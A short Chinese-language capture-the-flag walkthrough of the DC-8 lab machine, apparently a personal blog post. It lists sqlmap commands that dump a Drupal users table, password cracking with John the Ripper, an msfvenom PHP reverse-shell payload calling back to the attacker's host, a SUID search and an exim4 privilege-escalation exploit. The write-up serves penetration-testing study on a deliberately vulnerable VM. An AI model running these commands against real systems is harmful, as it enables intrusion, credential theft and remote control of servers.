各位小伙伴,可直接看这位师傅
https://blog.csdn.net/weixin_44288604/article/details/122944302
个人写的很粗糙
DC8本身的难度较低,可以较为轻松地获取到目标权限,总体思路
主机发现,端口扫描——挖掘服务漏洞——获取后台权限——上传shell——提权
主机发现,端口扫描,服务探测
一共开启2个端口,80和22端口,80端口开放的服务为drupal 7,打开界面进行检测,这里利用burpsuit联合xray进行检测
burpsuit的user option操作栏中设置自己闲置代理,运行xray即可,如下图所示这里使用bp自带的浏览器进行测试,然后在界面进行点击,每一个功能点都要点击下
点击到
http://192.168.43.142/?nid=3
该界面时候,xray检测到存在sql注入,直接上sqlmap
发现存在两个数据库,d7db,information_schema,这里选择第一个d7db,查看表名
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db --tables
在众多的表里面选择users表,直接下载
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db -T users --dump
发现存在两个用户,admin和john,但密码为加密之后的数据,尝试进行暴力破解,将这两个密文做成字典,使用john进行暴力破解,爆破出来其中john的密码为turtle,登录后台,查看能够上传shell的位置,这里建议使用谷歌浏览器,别问,问就是能够右键翻译
在这个界面中,可以定义输入表单之后的界面,这里采用msf生成php木马反弹,已经生成过了,不进行展示
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=8888 -f raw > shell.php
打开该文件,将文件复制到上图位置,选择PHP code,并保存,然后在对应的表单提交复核格式的数据,即可接受到会话
python交互式shell,查找有sudo权限执行的文件
find / -perm -u=s -type f 2>/dev/null
发现存在exim4为sudo权限,查看版本,查找对应exp
exp大法,这里下载第二个,然后复制到攻击机上面,使用python开启http服务,目标机下载运行
获得root权限